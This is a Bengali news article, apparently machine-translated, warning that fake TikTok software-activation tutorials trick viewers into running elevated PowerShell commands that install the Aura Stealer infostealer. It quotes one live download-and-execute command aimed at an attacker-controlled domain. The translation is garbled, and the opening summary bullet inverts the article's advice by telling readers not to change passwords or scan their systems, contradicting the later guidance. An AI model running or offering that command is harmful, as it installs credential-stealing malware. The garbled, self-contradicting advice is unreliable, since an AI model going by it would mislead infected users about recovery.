নকল TikTok টিউটোরিয়াল: ম্যালওয়্যার ইনস্টল করার ফাঁদ

  • "বিনামূল্যে" সফটওয়্যার সক্রিয় করার এবং ভুক্তভোগীদের প্রলুব্ধ করার জন্য টিকটক প্রচারণার নির্দেশিকা ছড়িয়ে দেওয়া।
  • ক্লিকফিক্স কৌশলটি বিশেষাধিকারপ্রাপ্ত পাওয়ারশেল কমান্ডগুলিকে কার্যকর করতে প্ররোচিত করে।
  • অরা স্টিলার এবং অনিশ্চিত ফাংশনের আরেকটি এক্সিকিউটেবল দূরবর্তী সার্ভার থেকে ডাউনলোড করা হয়।
  • সুপারিশ: ভিডিও কমান্ড চালাবেন না, পাসওয়ার্ড পরিবর্তন করবেন না, অথবা আপনার সিস্টেম স্ক্যান করবেন না।
Tablet Zona

4 মিনিট

ভুয়া TikTok টিউটোরিয়াল সম্পর্কে সতর্কতা

টিকটক ভিডিওর একটি ঢেউ টাকা ছাড়াই উইন্ডোজ, ফটোশপ বা নেটফ্লিক্স "সক্রিয়" করার প্রতিশ্রুতি দেয়, কিন্তু আসলে ব্যবহারকারীদের দৌড়াতে বাধ্য করে ছদ্মবেশী নির্দেশাবলী যা ম্যালওয়্যার ইনস্টল করার দিকে পরিচালিত করে এবং অপরাধীদের কাছে আপনার তথ্য প্রদান করা। সহজ প্রযুক্তিগত নির্দেশিকার আড়ালে, নির্মাতারা পদক্ষেপগুলি রূপরেখা দেন যা, যদি অক্ষরে অক্ষরে অনুসরণ করা হয়, সংক্রমণ এবং পরিচয়পত্র চুরির দরজা খুলে দিন.

SANS ইন্টারনেট স্টর্ম সেন্টারের গবেষকরা, যার মধ্যে জেভিয়ের মের্টেন্সও রয়েছেন, এবং ব্লিপিংকম্পিউটার এবং ট্রেন্ড মাইক্রোর মতো বিশেষায়িত মিডিয়া বিশ্লেষকরা একটি সমন্বিত প্রচারণার বর্ণনা দিয়েছেন যা " ক্লিক করুন। মূলত, শিকার নিক্ষেপ করতে রাজি হয় পাওয়ারশেল কমান্ড, যা দূরবর্তী সার্ভারের সাথে সংযোগ স্থাপন করে এবং ক্ষতিকারক পেলোড ডাউনলোড করুন এমনকি ক্লাউডফ্লেয়ার পেজের মতো বৈধ পরিষেবাগুলিতেও হোস্ট করা হয়।

ভিডিও এবং সংক্রমণের শৃঙ্খল কীভাবে কাজ করে

TikTok-এ ক্লিকফিক্স কৌশল

ক্লিপগুলি "ধাপে ধাপে" টিউটোরিয়ালের স্টাইল পুনরুত্পাদন করে এবং ব্যবহার করে প্রযুক্তিগত সহায়তার অনুকরণ করে এমন চাক্ষুষ নির্দেশাবলীলক্ষ্য হল ব্যবহারকারীর জন্য একটি সংক্ষিপ্ত কমান্ড অনুলিপি করা, উদাহরণস্বরূপ iex (irm slmgr.win/photoshop), এবং প্রশাসকের অনুমতি নিয়ে PowerShell-এ এটি চালান। সেই সহজ অঙ্গভঙ্গি, যা নির্দোষ বলে মনে হয়, স্ক্রিপ্ট ডাউনলোড ট্রিগার করে আক্রমণকারীদের দ্বারা নিয়ন্ত্রিত একটি ওয়েবসাইট থেকে অতিরিক্ত।

প্রথম স্ক্রিপ্টটি কার্যকর হওয়ার পরে, দ্বিতীয় পর্যায়টি ঘটে: দুটি এক্সিকিউটেবল এসেছে দূরবর্তী অবকাঠামো থেকে দলে। বিশ্লেষণ অনুসারে, তাদের মধ্যে একটির সাথে মিলে যায় অরা স্টিলার, সংবেদনশীল তথ্য সংগ্রহ করতে সক্ষম একজন তথ্য চোর; অন্যটি কোড কম্পাইল বা স্থাপন করা চাহিদা অনুযায়ী এবং এর সঠিক উদ্দেশ্য এখনও স্পষ্ট নয়, যদিও এটি সম্প্রসারণ বা স্থায়িত্ব ফাংশন আক্রমণের পরামর্শ দেয়।

প্রচারণার সাফল্য নির্ভর করে বৈধতার অনুভূতি এই ভিডিওগুলি প্রকাশ করে: প্রতিটি সফ্টওয়্যারের জন্য "নিজস্ব" কমান্ড, সংক্ষিপ্ত ব্যাখ্যা এবং একটি ফর্ম্যাট যা আপনাকে চিন্তা না করে কাজ করতে উৎসাহিত করে। তাড়াহুড়ো, স্রষ্টার উপর আস্থা এবং বিনামূল্যে "প্রিমিয়াম" কিছু পাওয়ার প্রতিশ্রুতির সমন্বয়। ব্যবহারকারীর সতর্কতা হ্রাস করে.

আক্রমণকারীরা টিকটকের বিশাল নাগালের সুযোগও নিচ্ছে। মাত্র কয়েকটি কন্টেন্টের মাধ্যমে, একটি নতুন তৈরি প্রোফাইল হাজার হাজার ভিউ সংগ্রহ করতে পারে, যা কেলেঙ্কারির পরিধি বহুগুণ বৃদ্ধি করে কয়েক ঘন্টার মধ্যে।

তারা কোন তথ্য চুরি করে এবং কোন নিয়ন্ত্রণ অর্জন করে

একবার সক্রিয় হয়ে গেলে, Aura Stealer ফোকাস করে লগইন শংসাপত্রগুলি বের করুন, প্রমাণীকরণ কুকিজ এবং সম্ভাব্য অ্যাক্সেস ক্রিপ্টোকারেন্সি ওয়ালেট ব্রাউজার বা অ্যাপ্লিকেশনে সংরক্ষিত। অপরাধীদের হাতে এই তথ্য থাকলে, ইমেল, সোশ্যাল মিডিয়া বা ব্যাংকিংয়ের মতো পরিষেবাগুলিতে অ্যাক্সেস করা সম্ভব।

দ্বিতীয় পর্যবেক্ষণযোগ্য এক্সিকিউটেবল হিসাবে কাজ করতে পারে সাপোর্ট মডিউল, ক্ষমতা সম্প্রসারণ করা, অ্যাক্সেস বজায় রাখা, নাকি ম্যালওয়্যার অপসারণ আরও কঠিন করা। বিশেষজ্ঞরা অতিরিক্ত উপাদান স্থাপনের সম্ভাবনা উড়িয়ে দেন না, যা পরবর্তী ব্যবহারের ঝুঁকি বাড়ায়, যেমন কম্পিউটারকে বটনেটের অংশে পরিণত করা বা আরও আক্রমণের সুবিধা প্রদান করা।

যারা কথিত "কৌশল" অনুসরণ করেছিল তাদের তাৎক্ষণিক পরিণতি স্পষ্ট: চুরি যাওয়া পাসওয়ার্ড এবং ব্যক্তিগত এবং আর্থিক তথ্যের সম্ভাব্য প্রকাশ। এছাড়াও, প্রশাসকের বিশেষাধিকার সহ কোড কার্যকর করা গভীর নিয়ন্ত্রণ দিতে পারে সিস্টেম থেকে তৃতীয় পক্ষ পর্যন্ত।

সতর্কতা চিহ্ন এবং কীভাবে নিজেকে রক্ষা করবেন

"বিনামূল্যে সক্রিয়" বা অর্থপ্রদানের বৈশিষ্ট্যগুলি "আনলক" করার প্রতিশ্রুতি দেয় এমন যেকোনো ভিডিও থেকে সাবধান থাকা ভাল। যেমন লক্ষণ টার্মিনালের জন্য কমান্ড, ছোট লিঙ্ক, অফিসিয়াল সাইটের বাইরে ডাউনলোড, সামান্য কার্যকলাপ সহ প্রোফাইল, অথবা অক্ষম মন্তব্যগুলি হল সতর্ক সংকেত যা উপেক্ষা করা উচিত নয়।

  • কপি বা এক্সিকিউট করবেন না সোশ্যাল মিডিয়াতে দেখা যাওয়া কমান্ড, বিশেষ করে PowerShell বা উন্নত অনুমতি সহ টার্মিনালগুলিতে।
  • সর্বদা ব্যবহার বৈধ সফ্টওয়্যার এবং লাইসেন্স এবং যাচাই না করা ইনস্টলার বা ফাটল এড়িয়ে চলুন।
  • রাখা আপডেটেড সিস্টেম এবং অ্যান্টিভাইরাস এবং আপনার সমস্ত অ্যাকাউন্টে দ্বি-পদক্ষেপ যাচাইকরণ চালু করুন।
  • লিঙ্ক এবং ডাউনলোডের ব্যাপারে সতর্ক থাকুন অফিসিয়াল পৃষ্ঠাগুলির বাইরে প্রদানকারীর কাছ থেকে।

যদি আপনি ইতিমধ্যেই পড়ে যান তাহলে কী করবেন?

যদি আপনি এই ভিডিওগুলির একটিতে নির্দেশাবলী অনুসরণ করে থাকেন, তাহলে অবিলম্বে পদক্ষেপ নিন: আপনার সমস্ত পাসওয়ার্ড পরিবর্তন করুন (ইমেল, নেটওয়ার্ক, ব্যাংকিং, স্ট্রিমিং পরিষেবা) এমন একটি ডিভাইস থেকে যা আপনি পরিষ্কার এবং আপোস করা ডিভাইস থেকে আলাদা বলে মনে করেন।

  • একটি করা সম্পূর্ণ বিশ্লেষণ আপডেটেড নিরাপত্তা সমাধান সহ।
  • সাম্প্রতিক প্রোগ্রাম বা ফাইলগুলি মুছে ফেলুন যা আপনি চিনতে পারেন না এবং যদি আপনি অস্বাভাবিক কার্যকলাপ সনাক্ত করেন, নেটওয়ার্ক থেকে সরঞ্জাম সংযোগ বিচ্ছিন্ন করুন যতক্ষণ না সংক্রমণ ঠিক হয়।
  • সিস্টেমটি পুনরুদ্ধার করার কথা বিবেচনা করুন অথবা পুন: প্রতিষ্ঠা যদি ক্ষতি অব্যাহত থাকে, তাহলে অনুগ্রহ করে সমস্ত সমর্থিত পরিষেবাগুলিতে 2FA সক্ষম করুন।

এই "দর কষাকষি" যতই লোভনীয় হোক না কেন, এর কোন লাইসেন্সবিহীন অর্থপ্রদানকারী সফ্টওয়্যার পাওয়ার বৈধ পদ্ধতিঅজানা উৎস থেকে আসা কমান্ড এড়িয়ে চলা এবং নিজেকে অফিসিয়াল চ্যানেলের মধ্যে সীমাবদ্ধ রাখা অজানা উৎস থেকে আসা কমান্ড এড়িয়ে চলার সবচেয়ে ভালো উপায়। এই প্রচারণাগুলি এড়ানোর সর্বোত্তম উপায় যারা দ্রুত ফর্ম্যাটের সুবিধা গ্রহণ করে এবং TikTok-এর উপর আস্থা রাখে।

সম্পর্কিত নিবন্ধ:
সম্পাদকীয় নীতিশাস্ত্র